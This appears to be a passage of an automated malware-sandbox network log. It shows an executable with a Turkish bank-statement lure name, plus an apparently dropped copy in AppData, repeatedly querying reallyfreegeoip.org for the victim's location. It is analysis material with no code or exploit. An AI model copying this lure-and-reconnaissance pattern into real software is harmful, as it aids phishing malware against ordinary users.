cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1462&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1825000&cwnd=252&unsent_bytes=0&cid=9dba5abaeff89bda&ts=461&x=0"
2024-12-10 13:07:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49754	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:36 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:37 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15380 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FgrICfkn6WMOmGGM96glukgjhsz892aDwT%2B4RwnZ9oaiMcpZsVG8jSmHZpAs2iXtYWr3CTLir5cHwxP6JnxsGSspkD6fS2If4a%2F2k8R8z9qLijzGgAS40vps%2BAUGw2wN9QiuHPOl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd757dc8d70cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1508&rtt_var=573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1897335&cwnd=152&unsent_bytes=0&cid=17463475612f4a13&ts=457&x=0"
2024-12-10 13:07:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49764	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:40 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:40 UTC	877	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15383 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JurPWnHHytYlf%2F1BXs71zAZmp4qlHPKwdLbuAmqa1zC8mx%2BUPau%2BoFBvQeBjb3GV9FF1OwjpcbGZd0ONxesNZy5M94CDlt0rY01uK%2FHPBPUgN5ZNtGcUEHe3rsf3TfT2wHWXy1Nn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75916f6441c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1619&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1759036&cwnd=205&unsent_bytes=0&cid=3eebcf54b757ab7d&ts=450&x=0"
2024-12-10 13:07:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49763	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:40 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:40 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15383 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkW5%2Biu7pazDEA4ZJ78Ge92s924ZAGBAsvnYhOLOjD2QEuYstDNAS0TSST%2Fp7xnDz%2FYqW9g31MzhTL1itdSioWd1olgSDpkrPmEuf7b6Zrl%2FPwfig%2FWbibN3smB3ZCu%2FXqWMxfpy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd7591fde97289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1818&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1473259&cwnd=238&unsent_bytes=0&cid=06efa265a7150d2b&ts=1152&x=0"
2024-12-10 13:07:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49772	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:42 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:42 UTC	873	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15385 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tta17cAg0T8ULMgL8BYNttH2KmkBcRwHYg429k2RwYEaKG1uSWoxv1vDwr74ej7%2BmK6ev2iwakJfjSv0iPOggQA7q3me7GcKiIejpsphntO6Nll1MC%2BHj5bWFxNUp7MBMu9hceUm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd759f5fd2c330-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1493&rtt_var=585&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1831869&cwnd=235&unsent_bytes=0&cid=5ea0182022485ddd&ts=454&x=0"
2024-12-10 13:07:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49774	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:43 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:43 UTC	874	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15386 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDjiE%2F7zvoHBcftzlQEh4vCMhrx1WFrG4YbI1TmGnH6cHKB3JrkNEO3ueypCOr6sJPm%2BAKk6v2oLkxenJ9GSiH4E9Do8Q7VGMXckNmmdphjiys43fm1XsfJKpbvqhwjM%2FdLq4g2j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75a4c8fb4344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2480&min_rtt=2470&rtt_var=947&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1142857&cwnd=47&unsent_bytes=0&cid=cd02b3c3baa6f3e6&ts=453&x=0"
2024-12-10 13:07:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49782	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:45 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:45 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15388 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGWvq3BTyevB9RKvmGK6Fks0zyB0IviG3NTLUnu%2BUC0UM26xYITPgYx6bRpuxvv6c%2BQToVVCsSggUakyUMRcJgLLeW0GONl2c0k6BE7aHt6Lx2UUrY%2BowfeY1t0EABmaRSxYvxwt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75b32e324390-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2276&min_rtt=2271&rtt_var=862&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1261339&cwnd=243&unsent_bytes=0&cid=8e449e9e0e1bf5c2&ts=450&x=0"
2024-12-10 13:07:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49787	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:46 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:46 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15389 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNKKXrEop3UokkoF7plU6Zqu%2BCRidcTHZzE%2BEeR7F1OL%2FkguelbGpQhsYAuezQMQtgqhSHovq1L4Zkn9WU3j2uYiYQq29kAeD0K82V6lkVcsgt6f27vHBFy3az3rB1aGj697ZMmp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75b978678cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1828&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1597374&cwnd=189&unsent_bytes=0&cid=783176ddf3d2138d&ts=674&x=0"
2024-12-10 13:07:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49797	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:48 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:49 UTC	881	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15391 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OEABBD%2FjdAPdqAHXaY8fici%2Fvh%2FLLtcczqTC9YmmTzpqwA4Z8%2FGnCFhzl4JPz8IJhAM6sOq%2FKED9u%2B9L24M9f6UNqNw9qkA0HqFR6bBYngVaPFGm1i3OLlwHmY3Apbx19b7p8si7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75c6ff67f791-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1466&rtt_var=564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1916010&cwnd=120&unsent_bytes=0&cid=abc0ce6e085efed3&ts=449&x=0"
2024-12-10 13:07:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49799	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:49 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:50 UTC	872	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15392 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKeMQNHtYeJaTeeJs07%2FqGyKf4VkfkDTXiA2FI0UOYD2B5u7mWZK383E6p4v6Ip8mlNsY5U8pQbfSxdK%2Fis0KMseMOQdOhPWiURHs2jiBtppYu4kVe0dBZrAeJB7mjgXHHf0X9Z0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75cd095a0c9e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1492&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1793611&cwnd=32&unsent_bytes=0&cid=4622a44cb0e8cfc8&ts=452&x=0"
2024-12-10 13:07:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49807	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:51 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
